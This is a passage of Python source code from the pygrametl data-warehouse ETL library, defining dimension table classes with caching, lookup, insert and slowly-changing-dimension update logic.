- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
"""
if not type(key) in pygrametl._stringtypes:
raise ValueError("Key argument must be a string")
if not len(attributes):
raise ValueError("No attributes given")
if targetconnection is None:
targetconnection = pygrametl.getdefaulttargetconnection()
if targetconnection is None:
raise ValueError("No target connection available")
self.targetconnection = targetconnection
self.name = name
self.attributes = attributes
self.key = key
self.all = [key, ]
self.all.extend(attributes)
if lookupatts == ():
lookupatts = attributes
elif not len(lookupatts):
raise ValueError("Lookupatts contain no attributes")
elif not set(lookupatts) <= set(self.all):
raise ValueError("Lookupatts is not a subset of attributes")
self.lookupatts = lookupatts
self.defaultidvalue = defaultidvalue
self.rowexpander = rowexpander
pygrametl._alltables.append(self)
# Now create the SQL that we will need...
# This gives "SELECT key FROM name WHERE lookupval1 = %(lookupval1)s
# AND lookupval2 = %(lookupval2)s AND ..."
self.keylookupsql = "SELECT " + key + " FROM " + name + " WHERE " + \
" AND ".join(["%s = %%(%s)s" % (lv, lv) for lv in lookupatts])
# This gives "SELECT key, att1, att2, ... FROM NAME WHERE key =
# %(key)s"
self.rowlookupsql = "SELECT " + ", ".join(self.all) + \
" FROM %s WHERE %s = %%(%s)s" % (name, key, key)
# This gives "INSERT INTO name(key, att1, att2, ...)
# VALUES (%(key)s, %(att1)s, %(att2)s, ...)"
self.insertsql = "INSERT INTO " + name + "(%s" % (key,) + \
(attributes and ", " or "") + \
", ".join(attributes) + ") VALUES (" + \
", ".join(["%%(%s)s" % (att,) for att in self.all]) + ")"
if idfinder is not None:
self.idfinder = idfinder
else:
self.targetconnection.execute("SELECT MAX(%s) FROM %s" %
(key, name))
self.__maxid = self.targetconnection.fetchonetuple()[0]
if self.__maxid is None:
self.__maxid = 0
self.idfinder = self._getnextid
def lookup(self, row, namemapping={}):
"""Find the key for the row with the given values.
Arguments:
- row: a dict which must contain at least the lookup attributes
- namemapping: an optional namemapping (see module's documentation)
"""
key = self._before_lookup(row, namemapping)
if key is not None:
return key
self.targetconnection.execute(self.keylookupsql, row, namemapping)
keyvalue = self.targetconnection.fetchonetuple()[0]
if keyvalue is None:
keyvalue = self.defaultidvalue # most likely also None...
self._after_lookup(row, namemapping, keyvalue)
return keyvalue
def _before_lookup(self, row, namemapping):
return None
def _after_lookup(self, row, namemapping, resultkeyvalue):
pass
def getbykey(self, keyvalue):
"""Lookup and return the row with the given key value.
If no row is found in the dimension table, the function returns
a row where all values (including the key) are None.
"""
if isinstance(keyvalue, dict):
keyvalue = keyvalue[self.key]
row = self._before_getbykey(keyvalue)
if row is not None:
return row
self.targetconnection.execute(self.rowlookupsql, {self.key: keyvalue})
row = self.targetconnection.fetchone(self.all)
self._after_getbykey(keyvalue, row)
return row
def _before_getbykey(self, keyvalue):
return None
def _after_getbykey(self, keyvalue, resultrow):
pass
def getbyvals(self, values, namemapping={}):
"""Return a list of all rows with values identical to the given.
Arguments:
- values: a dict which must hold a subset of the tables attributes.
All rows that have identical values for all attributes in this
dict are returned.
- namemapping: an optional namemapping (see module's documentation)
"""
res = self._before_getbyvals(values, namemapping)
if res is not None:
return res
# select all attributes from the table. The attributes available from
# the values dict are used in the WHERE clause.
attstouse = [a for a in self.attributes
if a in values or a in namemapping]
sql = "SELECT " + ", ".join(self.all) + " FROM " + self.name + \
" WHERE " + \
" AND ".join(["%s = %%(%s)s" % (att, att) for att in attstouse])
self.targetconnection.execute(sql, values, namemapping)
res = [r for r in self.targetconnection.rowfactory(self.all)]
self._after_getbyvals(values, namemapping, res)
return res
def _before_getbyvals(self, values, namemapping):
return None
def _after_getbyvals(self, values, namemapping, resultrows):
pass
def update(self, row, namemapping={}):
"""Update a single row in the dimension table.
Arguments:
- row: a dict which must contain the key for the dimension.
The row with this key value is updated such that it takes
the value of row[att] for each attribute att which is also in
row.
- namemapping: an optional namemapping (see module's documentation)
"""
res = self._before_update(row, namemapping)
if res:
return
if self.key not in row:
raise KeyError("The key value (%s) is missing in the row" %
(self.key,))
attstouse = [a for a in self.attributes
if a in row or a in namemapping]
if not attstouse:
# Only the key was there - there are no attributes to update
return
sql = "UPDATE " + self.name + " SET " + \
", ".join(["%s = %%(%s)s" % (att, att) for att in attstouse]) + \
" WHERE %s = %%(%s)s" % (self.key, self.key)
self.targetconnection.execute(sql, row, namemapping)
self._after_update(row, namemapping)
def _before_update(self, row, namemapping):
return None
def _after_update(self, row, namemapping):
pass
def ensure(self, row, namemapping={}):
"""Lookup the given row. If that fails, insert it. Return the key value.
If the lookup fails and a rowexpander was set when creating the
instance, this rowexpander is called before the insert takes place.
Arguments:
- row: the row to lookup or insert. Must contain the lookup
attributes.
- namemapping: an optional namemapping (see module's documentation)
"""
res = self.lookup(row, namemapping)
if res is not None and res != self.defaultidvalue:
return res
else:
if self.rowexpander:
row = self.rowexpander(row, namemapping)
return self.insert(row, namemapping)
def insert(self, row, namemapping={}):
"""Insert the given row. Return the new key value.
Arguments:
- row: the row to insert. The dict is not updated. It must contain
all attributes, and is allowed to contain more attributes than
that.
- namemapping: an optional namemapping (see module's documentation)
"""
res = self._before_insert(row, namemapping)
if res is not None:
return res
key = (namemapping.get(self.key) or self.key)
if row.get(key) is None:
keyval = self.idfinder(row, namemapping)
row = dict(row) # Make a copy to change
row[key] = keyval
else:
keyval = row[key]
self.targetconnection.execute(self.insertsql, row, namemapping)
self._after_insert(row, namemapping, keyval)
return keyval
def _before_insert(self, row, namemapping):
return None
def _after_insert(self, row, namemapping, newkeyvalue):
pass
def _getnextid(self, ignoredrow, ignoredmapping):
self.__maxid += 1
return self.__maxid
def endload(self):
"""Finalize the load."""
pass
class CachedDimension(Dimension):
"""A class for accessing a dimension. Does caching.
We assume that the DB doesn't change or add any attribute
values that are cached.
For example, a DEFAULT value in the DB or automatic type coercion can
break this assumption.
"""
def __init__(self, name, key, attributes, lookupatts=(),
idfinder=None, defaultidvalue=None, rowexpander=None,
size=10000, prefill=False, cachefullrows=False,
cacheoninsert=True, usefetchfirst=False,
targetconnection=None):
"""Arguments:
- name: the name of the dimension table in the DW
- key: the name of the primary key in the DW
- attributes: a sequence of the attribute names in the dimension
table. Should not include the name of the primary key which is
given in the key argument.
- lookupatts: A subset of the attributes that uniquely identify
a dimension members. These attributes are thus used for looking
up members. If not given, it is assumed that
lookupatts = attributes
- idfinder: A function(row, namemapping) -> key value that assigns
a value to the primary key attribute based on the content of the
row and namemapping. If not given, it is assumed that the primary
key is an integer, and the assigned key value is then the current
maximum plus one.
- defaultidvalue: An optional value to return when a lookup fails.
This should thus be the ID for a preloaded "Unknown" member.
- rowexpander: A function(row, namemapping) -> row. This function
is called by ensure before insertion if a lookup of the row fails.
This is practical if expensive calculations only have to be done
for rows that are not already present. For example, for a date
dimension where the full date is used for looking up rows, a
rowexpander can be set such that week day, week number, season,
year, etc. are only calculated for dates that are not already
represented. If not given, no automatic expansion of rows is
done.
- size: the maximum number of rows to cache. If less than or equal
to 0, unlimited caching is used. Default: 10000
- prefill: a flag deciding if the cache should be filled when
initialized. Default: False
- cachefullrows: a flag deciding if full rows should be
cached. If not, the cache only holds a mapping from
lookupattributes to key values. Default: False.
- cacheoninsert: a flag deciding if the cache should be updated
when insertions are done. Default: True
- usefetchfirst: a flag deciding if the SQL:2008 FETCH FIRST
clause is used when prefil is True. Depending on the used DBMS
and DB driver, this can give significant savings wrt. to time and
memory. Not all DBMSs support this clause yet. Default: False
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
"""
Dimension.__init__(self,
name=name,
key=key,
attributes=attributes,
lookupatts=lookupatts,
idfinder=idfinder,
defaultidvalue=defaultidvalue,
rowexpander=rowexpander,
targetconnection=targetconnection)
self.cacheoninsert = cacheoninsert
self.__prefill = prefill
self.__size = size
if size > 0:
if cachefullrows:
self.__key2row = FIFODict(size)
self.__vals2key = FIFODict(size)
else:
# Use dictionaries as unlimited caches
if cachefullrows:
self.__key2row = {}
self.__vals2key = {}
self.cachefullrows = cachefullrows
if prefill:
if cachefullrows:
positions = tuple([self.all.index(att)
for att in self.lookupatts])
# select the key and all attributes
sql = "SELECT %s FROM %s" % (", ".join(self.all), name)
else:
# select the key and the lookup attributes
sql = "SELECT %s FROM %s" % \
(", ".join([key] + [l for l in self.lookupatts]), name)
positions = range(1, len(self.lookupatts) + 1)
if size > 0 and usefetchfirst:
sql += " FETCH FIRST %d ROWS ONLY" % size
self.targetconnection.execute(sql)
if size <= 0:
data = self.targetconnection.fetchalltuples()
else:
data = self.targetconnection.fetchmanytuples(size)
for rawrow in data:
if cachefullrows:
self.__key2row[rawrow[0]] = rawrow
t = tuple([rawrow[i] for i in positions])
self.__vals2key[t] = rawrow[0]
def lookup(self, row, namemapping={}):
if self.__prefill and self.cacheoninsert and \
(self.__size <= 0 or len(self.__vals2key) < self.__size):
# Everything is cached. We don't have to look in the DB
res = self._before_lookup(row, namemapping)
if res is not None:
return res
else:
return self.defaultidvalue
else:
# Something is not cached so we have to use the classical lookup.
# (We may still benefit from the cache due to a call of
# _before_lookup)
return Dimension.lookup(self, row, namemapping)
def _before_lookup(self, row, namemapping):
namesinrow = [(namemapping.get(a) or a) for a in self.lookupatts]
searchtuple = tuple([row[n] for n in namesinrow])
return self.__vals2key.get(searchtuple, None)
def _after_lookup(self, row, namemapping, resultkey):
if resultkey is not None and (self.defaultidvalue is None or
resultkey != self.defaultidvalue):
namesinrow = [(namemapping.get(a) or a) for a in self.lookupatts]
searchtuple = tuple([row[n] for n in namesinrow])
self.__vals2key[searchtuple] = resultkey
def _before_getbykey(self, keyvalue):
if self.cachefullrows:
res = self.__key2row.get(keyvalue)
if res is not None:
return dict(zip(self.all, res))
return None
def _after_getbykey(self, keyvalue, resultrow):
if self.cachefullrows and resultrow[self.key] is not None:
# if resultrow[self.key] is None, no result was found in the db
self.__key2row[keyvalue] = tuple([resultrow[a] for a in self.all])
def _before_update(self, row, namemapping):
""" """
# We have to remove old values from the caches.
key = (namemapping.get(self.key) or self.key)
for att in self.lookupatts:
if ((att in namemapping and
namemapping[att] in row) or att in row):
# A lookup attribute is about to be changed and we should make
# sure that the cache does not map from the old value. Here,
# we can only see the new value, but we can get the old lookup
# values by means of the key:
oldrow = self.getbykey(row[key])
namesinrow = [(namemapping.get(a) or a)
for a in self.lookupatts]
searchtuple = tuple([oldrow[n] for n in namesinrow])
if searchtuple in self.__vals2key:
del self.__vals2key[searchtuple]
break
if self.cachefullrows:
if row[key] in self.__key2row:
# The cached row is now incorrect. We must make sure it is
# not in the cache.
del self.__key2row[row[key]]
return None
def _after_update(self, row, namemapping):
""" """
if self.__prefill and self.cacheoninsert and \
(self.__size <= 0 or len(self.__vals2key) < self.__size):
# Everything is cached and we sometimes avoid looking in the DB.
# Therefore, we have to update the cache now. In _before_update,
# we deleted the cached data.
keyval = row[(namemapping.get(self.key) or self.key)]
newrow = self.getbykey(keyval) # This also updates __key2row
self._after_lookup(newrow, {}, keyval) # Updates __vals2key
def _after_insert(self, row, namemapping, newkeyvalue):
""" """
# After the insert, we can look the row up. Pretend that we
# did that. Then we get the new data cached.
# NB: Here we assume that the DB doesn't change or add anything.
# For example, a DEFAULT value in the DB or automatic type coercion can
# break this assumption.
if self.cacheoninsert:
self._after_lookup(row, namemapping, newkeyvalue)
if self.cachefullrows:
tmp = pygrametl.project(self.all, row, namemapping)
tmp[self.key] = newkeyvalue
self._after_getbykey(newkeyvalue, tmp)
class TypeOneSlowlyChangingDimension(CachedDimension):
"""A class for accessing a slowly changing dimension of "type 1".
Caching is used. We assume that the DB doesn't change or add any
attribute values that are cached.
For example, a DEFAULT value in the DB or automatic type coercion can
break this assumption.
"""
def __init__(self, name, key, attributes, lookupatts, type1atts=(),
cachesize=10000, prefill=False, idfinder=None,
usefetchfirst=False, targetconnection=None):
"""Arguments:
- name: the name of the dimension table in the DW
- key: the name of the primary key in the DW
- attributes: a sequence of the attribute names in the dimension
table. Should not include the name of the primary key which is
given in the key argument.
- lookupatts: A subset of the attributes that uniquely identify
a dimension members. These attributes are thus used for looking
up members.
- type1atts: A sequence of attributes that should have type1 updates
applied, it cannot intersect with lookupatts. If not given, it is
assumed that type1atts = attributes - lookupatts
- cachesize: the maximum number of rows to cache. If less than or
equal to 0, unlimited caching is used. Default: 10000
- prefill: a flag deciding if the cache should be filled when
initialized. Default: False
- idfinder: A function(row, namemapping) -> key value that assigns
a value to the primary key attribute based on the content of the
row and namemapping. If not given, it is assumed that the primary
key is an integer, and the assigned key value is then the current
maximum plus one.
- usefetchfirst: a flag deciding if the SQL:2008 FETCH FIRST
clause is used when prefil is True. Depending on the used DBMS
and DB driver, this can give significant savings wrt. to time and
memory. Not all DBMSs support this clause yet. Default: False
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
"""
CachedDimension.__init__(self,
name=name,
key=key,
attributes=attributes,
lookupatts=lookupatts,
idfinder=idfinder,
defaultidvalue=None,
rowexpander=None,
size=cachesize,
prefill=prefill,
cachefullrows=False,
cacheoninsert=True,
usefetchfirst=usefetchfirst,
targetconnection=targetconnection)
if type1atts == ():
type1atts = list(set(attributes) - set(lookupatts))
elif not set(type1atts) < set(attributes):
raise ValueError("Type1atts is not a subset of attributes")
elif set(lookupatts) & set(type1atts):
raise ValueError("Intersection between lookupatts and type1atts")
# Ensures "lookupatts != attributes" as it prevents type 1 updates
if not len(type1atts):
raise ValueError("Type1atts contain no attributes")
self.type1atts = type1atts
def scdensure(self, row, namemapping={}):
"""Lookup or insert a version of a slowly changing dimension member.
.. Note:: Has side-effects on the given row.
Arguments:
- row: a dict containing the attributes for the table. It must
contain all attributes if it is the first version of the row to be
inserted, updates of existing rows need only contain lookupatts
and a subset of type1atts as a missing type1atts is ignored and
the existing value left as is in the database.
- namemapping: an optional namemapping (see module's documentation)
"""
# NOTE: the "vals2key" cache is kept coherent by "scdensure", as it only
# contains "lookupatts" which "scdensure" is prohibited from changing
keyval = self.lookup(row, namemapping)
key = (namemapping.get(self.key) or self.key)
if keyval is None:
# The first version of the row is inserted
keyval = self.insert(row, namemapping)
row[key] = keyval
else:
# The row did exist so we update the type1atts provided
row[key] = keyval
# Takes the user provided namemapping into account and checks what
# subset of type1atts should be updated based on the content of row
type1atts = []
for att in self.type1atts:
if (namemapping.get(att) or att) in row:
type1atts.append(att)
if not type1atts:
return
# The SQL is constructed to update only the changed values without
# the need for looking up the old row to extract the existing
# values
updatesql = "UPDATE " + self.name + " SET " + \
", ".join(["%s = %%(%s)s" % \
(att, att) for att in type1atts]) + \
" WHERE %s = %%(%s)s" % (key, key)
# Update is not used, to skip the checks for updates to the caches
self.targetconnection.execute(updatesql, row, namemapping)
return row[key]
class SlowlyChangingDimension(Dimension):
"""A class for accessing a slowly changing dimension of "type 2".
"Type 1" updates can also be applied for a subset of the attributes.
Caching is used. We assume that the DB doesn't change or add any
attribute values that are cached.
For example, a DEFAULT value in the DB or automatic type coercion can
break this assumption.
"""
def __init__(self, name, key, attributes, lookupatts, versionatt,
fromatt=None, fromfinder=None,
toatt=None, tofinder=None, minfrom=None, maxto=None,
srcdateatt=None, srcdateparser=pygrametl.ymdparser,
type1atts=(), cachesize=10000, prefill=False, idfinder=None,
usefetchfirst=False, targetconnection=None):
"""Arguments:
- name: the name of the dimension table in the DW
- key: the name of the primary key in the DW
- attributes: a sequence of the attribute names in the dimension
table. Should not include the name of the primary key which is
given in the key argument, but should include versionatt,
fromatt, and toatt.
- lookupatts: a sequence with a subset of the attributes that
uniquely identify a dimension members. These attributes are thus
used for looking up members.
- versionatt: the name of the attribute holding the version number
- fromatt: the name of the attribute telling from when the version
becomes valid. Not used if None. Default: None
- fromfinder: a function(targetconnection, row, namemapping)
returning a value for the fromatt for a new version (the function
is first used when it is determined that a new version must be
added; it is not applied to determine this).
If fromfinder is None and srcdateatt is also None,
pygrametl.today is used as fromfinder. If fromfinder is None
and srcdateatt is not None,
pygrametl.datereader(srcdateatt, srcdateparser) is used.
In other words, if no date attribute and no special
date function are given, new versions get the date of the current
day. If a date attribute is given (but no date function), the
date attribute's value is converted (by means of srcdateparser)
and a new version gets the result of this as the date it is valid
from. Default: None
- toatt: the name of the attribute telling until when the version
is valid. Not used if None. Default: None
- tofinder: a function(targetconnection, row, namemapping)
returning a value for the toatt. If not set, fromfinder is used
(note that if fromfinder is None, it is set to a default
function -- see the comments about fromfinder. The possibly
modified value is used here.) Default: None
- minfrom: the value to use for fromatt for the 1st version of a
member if fromatt is not already set. If None, the value is
found in the same way as for other new versions, i.e., as
described for fromfinder. If fromatt should take the value
NULL for the 1st version, set minfrom to a tuple holding a single
element which is None: (None,). Note that minto affects the 1st
version, not any following versions. Note also that if the member
to insert already contains a value for fromatt, minfrom is ignored.
Default: None.
- maxto: the value to use for toatt for new members. Default: None
- srcdateatt: the name of the attribute in the source data that
holds a date showing when a version is valid from. The data is
converted to a datetime by applying srcdateparser on it.
If not None, the date attribute is also used when comparing
a potential new version to the newest version in the DB.
If None, the date fields are not compared. Default: None
- srcdateparser: a function that takes one argument (a date in the
format scrdateatt has) and returns a datetime.datetime.
If srcdateatt is None, srcdateparser is not used.
Default: pygrametl.ymdparser (i.e., the default value is a
function that parses a string of the form 'yyyy-MM-dd')
- type1atts: a sequence of attributes that should have type1 updates
applied. Default: ()
- cachesize: the maximum size of the cache. 0 disables caching
and values smaller than 0 allows unlimited caching
- prefill: decides if the cache should be prefilled with the newest
versions. Default: False. NB: This is a new argument in ver. 0.2.0.
- idfinder: a function(row, namemapping) -> key value that assigns
a value to the primary key attribute based on the content of the
row and namemapping. If not given, it is assumed that the primary
key is an integer, and the assigned key value is then the current
maximum plus one.
- usefetchfirst: a flag deciding if the SQL:2008 FETCH FIRST
clause is used when prefil is True. Depending on the used DBMS
and DB driver, this can give significant savings wrt. to time and
memory. Not all DBMSs support this clause yet. Default: False
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
"""
# TODO: Should scdensure just override ensure instead of being a new
# method?
Dimension.__init__(self,
name=name,
key=key,
attributes=attributes,
lookupatts=lookupatts,
idfinder=idfinder,
defaultidvalue=None,
rowexpander=None,
targetconnection=targetconnection)
if not versionatt:
raise ValueError('A version attribute must be given')
self.versionatt = versionatt
self.fromatt = fromatt
if fromfinder is not None:
self.fromfinder = fromfinder
elif srcdateatt is not None: # and fromfinder is None
self.fromfinder = pygrametl.datereader(srcdateatt, srcdateparser)
else: # fromfinder is None and srcdateatt is None
self.fromfinder = pygrametl.today
self.toatt = toatt
if tofinder is None:
tofinder = self.fromfinder
self.tofinder = tofinder
self.minfrom = minfrom
self.maxto = maxto
self.srcdateatt = srcdateatt
self.srcdateparser = srcdateparser
self.type1atts = type1atts
if cachesize > 0:
self.rowcache = FIFODict(cachesize)
self.keycache = FIFODict(cachesize)
elif cachesize < 0:
self.rowcache = {}
self.keycache = {}
# else cachesize == 0 and we do not create any caches
self.__cachesize = cachesize
self.__prefill = prefill
# Check that versionatt, fromatt and toatt are also declared as
# attributes
for var in (versionatt, fromatt, toatt):
if var and var not in attributes:
raise ValueError("%s not present in attributes argument" %
(var,))
# Now extend the SQL from Dimension such that we use the versioning
self.keylookupsql += " ORDER BY %s DESC" % (versionatt,)
if toatt:
self.updatetodatesql = \
"UPDATE %s SET %s = %%(%s)s WHERE %s = %%(%s)s" % \
(name, toatt, toatt, key, key)
if prefill:
self.__prefillcaches(usefetchfirst)
def __prefillcaches(self, usefetchfirst):
args = None
if self.toatt:
# We can use the toatt to see if rows are still current.
# Select all attributes from the rows where maxto is set to the
# default value (which may be NULL)
sql = 'SELECT %s FROM %s WHERE %s %s' % \
(', '.join(self.all), self.name, self.toatt,
self.maxto is None and 'IS NULL' or '= %(maxto)s')
if self.maxto is not None:
args = {'maxto': self.maxto}
else:
# We have to find max(versionatt) for each group of lookupatts and
# do a join to get the right rows.
lookupattlist = ', '.join(self.lookupatts)
newestversions = ('SELECT %s, MAX(%s) AS %s FROM %s GROUP BY %s' %
(lookupattlist, self.versionatt, self.versionatt, self.name,
lookupattlist))
joincond = ' AND '.join(['A.%s = B.%s' % (att, att) for att in
[l for l in self.lookupatts] +
[self.versionatt]
])
sql = 'SELECT %s FROM (%s) AS A, %s AS B WHERE %s' %\
(', '.join(['B.%s AS %s' % (att, att) for att in self.all]),
newestversions, self.name, joincond)
# sql is a statement that fetches the newest versions from the database
# in order to fill the caches, the FETCH FIRST clause is for a finite
# cache, if the user set the flag that it is supported by the database.
positions = [self.all.index(att) for att in self.lookupatts]
if self.__cachesize > 0 and usefetchfirst:
sql += ' FETCH FIRST %d ROWS ONLY' % self.__cachesize
self.targetconnection.execute(sql, args)
for rawrow in self.targetconnection.fetchmanytuples(self.__cachesize):
self.rowcache[rawrow[0]] = rawrow
t = tuple([rawrow[i] for i in positions])
self.keycache[t] = rawrow[0]
def lookup(self, row, namemapping={}):
"""Find the key for the newest version with the given values.
Arguments:
- row: a dict which must contain at least the lookup attributes
- namemapping: an optional namemapping (see module's documentation)
"""
if self.__prefill and (self.__cachesize < 0 or
len(self.keycache) < self.__cachesize):
# Everything is cached. We don't have to look in the DB
return self._before_lookup(row, namemapping)
else:
# Something is not cached so we have to use the classical lookup.
# Note that __init__ updated self.keylookupsql to use ORDER BY ...
return Dimension.lookup(self, row, namemapping)
def scdensure(self, row, namemapping={}):
"""Lookup or insert a version of a slowly changing dimension member.
.. Note:: Has side-effects on the given row.
Arguments:
- row: a dict containing the attributes for the member.
key, versionatt, fromatt, and toatt are not required to be
present but will be added (if defined).
- namemapping: an optional namemapping (see module's documentation)
"""
versionatt = (namemapping.get(self.versionatt) or self.versionatt)
key = (namemapping.get(self.key) or self.key)
if self.fromatt: # this protects us against None in namemapping.
fromatt = (namemapping.get(self.fromatt) or self.fromatt)
else:
fromatt = None
if self.toatt:
toatt = (namemapping.get(self.toatt) or self.toatt)
else:
toatt = None
if self.srcdateatt:
srcdateatt = (namemapping.get(self.srcdateatt) or self.srcdateatt)
else:
srcdateatt = None
# Get the newest version and compare to that
keyval = self.lookup(row, namemapping)
if keyval is None:
# It is a new member. We add the first version.
row[versionatt] = 1
if fromatt and fromatt not in row:
if self.minfrom is not None:
# We need the following hack to distinguish between
# 'not set' and 'use the value None'...
if self.minfrom == (None,):
row[fromatt] = None
else:
row[fromatt] = self.minfrom
else:
row[fromatt] = self.fromfinder(self.targetconnection,
row, namemapping)
if toatt and toatt not in row:
row[toatt] = self.maxto
row[key] = self.insert(row, namemapping)
return row[key]
else:
# There is an existing version. Check if the attributes are
# identical
type1updates = {} # for type 1
addnewversion = False # for type 2
other = self.getbykey(keyval) # the full existing version
for att in self.all:
# Special (non-)handling of versioning and key attributes:
if att in (self.key, self.versionatt, self.toatt):
# Don't compare these - we don't expect them to have
# meaningful values in row
continue
# We may have to compare the "from dates"
elif att == self.fromatt:
if self.srcdateatt is None: # We don't compare dates then
continue
else:
# We have to compare the dates in row[..] and other[..].
# We have to make sure that the dates are of comparable
# types.
rdt = self.srcdateparser(row[srcdateatt])
if rdt == other[self.fromatt]:
continue # no change in the "from attribute"
elif isinstance(rdt, type(other[self.fromatt])):
# they are not equal but are of the same type, so we
# are dealing with a new date
addnewversion = True
else:
# They have different types (and are thus not
# equal). Try to convert to strings and see if they
# are equal.
modref = self.targetconnection.getunderlyingmodule()
rowdate = modref.Date(rdt.year, rdt.month, rdt.day)
if str(rowdate).strip('\'"') != \
str(other[self.fromatt]).strip('\'"'):
addnewversion = True
# Handling of "normal" attributes:
else:
mapped = (namemapping.get(att) or att)
if row[mapped] != other[att]:
if att in self.type1atts:
type1updates[att] = row[mapped]
else:
addnewversion = True
if addnewversion and not self.type1atts:
# We don't have to look for possible type 1 updates
# and we already know that a type 2 update is needed.
break
# else: continue
if len(type1updates) > 0:
# Some type 1 updates were found
self.__performtype1updates(type1updates, other)
if addnewversion: # type 2
# Make a new row version and insert it
row.pop(key, None)
row[versionatt] = other[self.versionatt] + 1
if fromatt:
row[fromatt] = self.fromfinder(self.targetconnection,
row, namemapping)
if toatt:
row[toatt] = self.maxto
row[key] = self.insert(row, namemapping)
# Update the todate attribute in the old row version in the DB.
if toatt:
toattval = self.tofinder(self.targetconnection, row,
namemapping)
self.targetconnection.execute(
self.updatetodatesql, {
self.key: keyval, self.toatt: toattval})
# Only cache the newest version - this is new in ver. 0.2.0!
if keyval in self.rowcache:
del self.rowcache[keyval]
else:
# Update the row dict by giving version and dates and the key
row[key] = keyval
row[versionatt] = other[self.versionatt]
if self.fromatt:
row[fromatt] = other[self.fromatt]
if self.toatt:
row[toatt] = other[self.toatt]
return row[key]
def _before_lookup(self, row, namemapping):
if self.__cachesize:
namesinrow = [(namemapping.get(a) or a) for a in self.lookupatts]
searchtuple = tuple([row[n] for n in namesinrow])
return self.keycache.get(searchtuple, None)
return None
def _after_lookup(self, row, namemapping, resultkey):
if self.__cachesize and resultkey is not None:
namesinrow = [(namemapping.get(a) or a) for a in self.lookupatts]
searchtuple = tuple([row[n] for n in namesinrow])
self.keycache[searchtuple] = resultkey
def _before_getbykey(self, keyvalue):
if self.__cachesize:
res = self.rowcache.get(keyvalue)
if res is not None:
return dict(zip(self.all, res))
return None
def _after_getbykey(self, keyvalue, resultrow):
if self.__cachesize and resultrow[self.key] is not None:
# if resultrow[self.key] is None, no result was found in the db
self.rowcache[keyvalue] = tuple([resultrow[a] for a in self.all])
def _before_update(self, row, namemapping):
""" """
# We have to remove old values from the caches.
key = (namemapping.get(self.key) or self.key)
for att in self.lookupatts:
if (att in namemapping or att in row):
# A lookup attribute is about to be changed and we should make
# sure that the cache does not map from the old value. Here,
# we can only see the new value, but we can get the old lookup
# values by means of the key:
oldrow = self.getbykey(row[key])
namesinrow = [(namemapping.get(a) or a)
for a in self.lookupatts]
searchtuple = tuple([oldrow[n] for n in namesinrow])
if searchtuple in self.keycache:
del self.keycache[searchtuple]
break
if row[key] in self.rowcache:
# The cached row is now incorrect. We must make sure it is
# not in the cache.
del self.rowcache[row[key]]
return None
def _after_insert(self, row, namemapping, newkeyvalue):
""" """
# After the insert, we can look it up. Pretend that we
# did that. Then we get the new data cached.
# NB: Here we assume that the DB doesn't change or add anything.
# For example, a DEFAULT value in the DB or automatic type coercion can
# break this assumption.
# Note that we always cache inserted members (in CachedDimension
# this is an option).
if self.__cachesize:
self._after_lookup(row, namemapping, newkeyvalue)
tmp = pygrametl.project(self.all[1:], row, namemapping)
tmp[self.key] = newkeyvalue
self._after_getbykey(newkeyvalue, tmp)
def __performtype1updates(self, updates, lookupvalues, namemapping={}):
""" """
# find the keys in the rows that should be updated
self.targetconnection.execute(self.keylookupsql, lookupvalues,
namemapping)
updatekeys = [e[0] for e in self.targetconnection.fetchalltuples()]
updatekeys.reverse()
# Generate SQL for the update
valparts = ", ".join(["%s = %%(%s)s" % (k, k) for k in updates])
keyparts = ", ".join([str(k) for k in updatekeys])
sql = "UPDATE %s SET %s WHERE %s IN (%s)" % \
(self.name, valparts, self.key, keyparts)
self.targetconnection.execute(sql, updates)
# Remove from our own cache
for key in updatekeys:
if key in self.rowcache:
del self.rowcache[key]
SCDimension = SlowlyChangingDimension
# NB: SnowflakedDimension's methods may have side-effects:
# row[somedim.key] = someval.
class SnowflakedDimension(object):
"""A class for accessing a snowflaked dimension spanning several tables
in the underlying database. Lookups and inserts are then automatically
spread out over the relevant tables while the programmer only needs
to interact with a single SnowflakedDimension instance.
"""
def __init__(self, references, expectboguskeyvalues=False):
"""Arguments:
- references: a sequence of pairs of Dimension objects
[(a1,a2), (b1,b2), ...] meaning that a1 has a foreign key to a2
etc. a2 may itself be a sequence of Dimensions:
[(a1, [a21, a22, ...]), (b1, [b21, b22, ...]), ...].
The first element of the first pair (a1 in the example above) must
be the dimension table representing the lowest level in the
hierarchy (i.e., the dimension table the closest to the fact
table).
Each dimension must be reachable in a unique way (i.e., the
given dimensions form a tree).
A foreign key must have the same name as the primary key it
references.
- expectboguskeyvalues: If expectboguskeyvalues is True, we allow a
key that is used as lookup attribute in a lower level to hold a
wrong value (which would typically be None). When ensure or
insert is called, we find the correct value for the key in the
higher level. If expectboguskeyvalues, we again try a lookup on
the lower level after this. If expectboguskeyvalues is False, we
move directly on to do an insert. Default: False
"""
self.root = references[0][0]
self.targetconnection = self.root.targetconnection
self.key = self.root.key
self.lookupatts = self.root.lookupatts
dims = set([self.root])
self.refs = {}
self.refkeys = {}
self.all = self.root.all[:]
for (dim, refeddims) in references:
# Check that all dimensions use the same target connection.
# Build the dict self.refs:
# {dimension -> set(refed dimensions)}
# Build self.all from dimensions' lists
# Keep track of seen dimensions by means of the set dims and
# ensure that each table is only reachable once.
if isinstance(refeddims, Dimension):
# If there is only one dimension, then make a tuple with that
refeddims = (refeddims, )
for rd in refeddims:
if rd.targetconnection is not self.targetconnection:
raise ValueError("Different connections used")
if rd in dims:
raise ValueError("The tables do not form a tree")
dims.add(rd)
tmp = self.refs.get(dim, set())
tmp.add(rd)
self.refs[dim] = tmp
# The key is alredy there as we assume FKs and PKs have
# identical names
self.all.extend(list(rd.attributes))
# Check that all dimensions in dims are reachable from the root
dimscopy = dims.copy()
dimscopy.remove(self.root)
for (tbl, targets) in self.refs.items():
for target in targets:
# It is safe to use remove as each dim is only referenced once
dimscopy.remove(target)
# Those dimensions that are left in dims at this point are unreachable
if len(dimscopy) != 0:
raise ValueError("Not every given dimension is reachable")
# Construct SQL...
self.keylookupsql = self.root.keylookupsql
self.allnames = []
for dim in dims:
for att in dim.attributes:
self.allnames.append(att)
# Make sure that there are no duplicated names:
if len(self.allnames) != len(set(self.allnames)):
raise ValueError("Duplicated attribute names found")
self.alljoinssql = "SELECT " + ", ".join(self.allnames) + \
" FROM " + " NATURAL JOIN ".join(map(lambda d: d.name, dims))
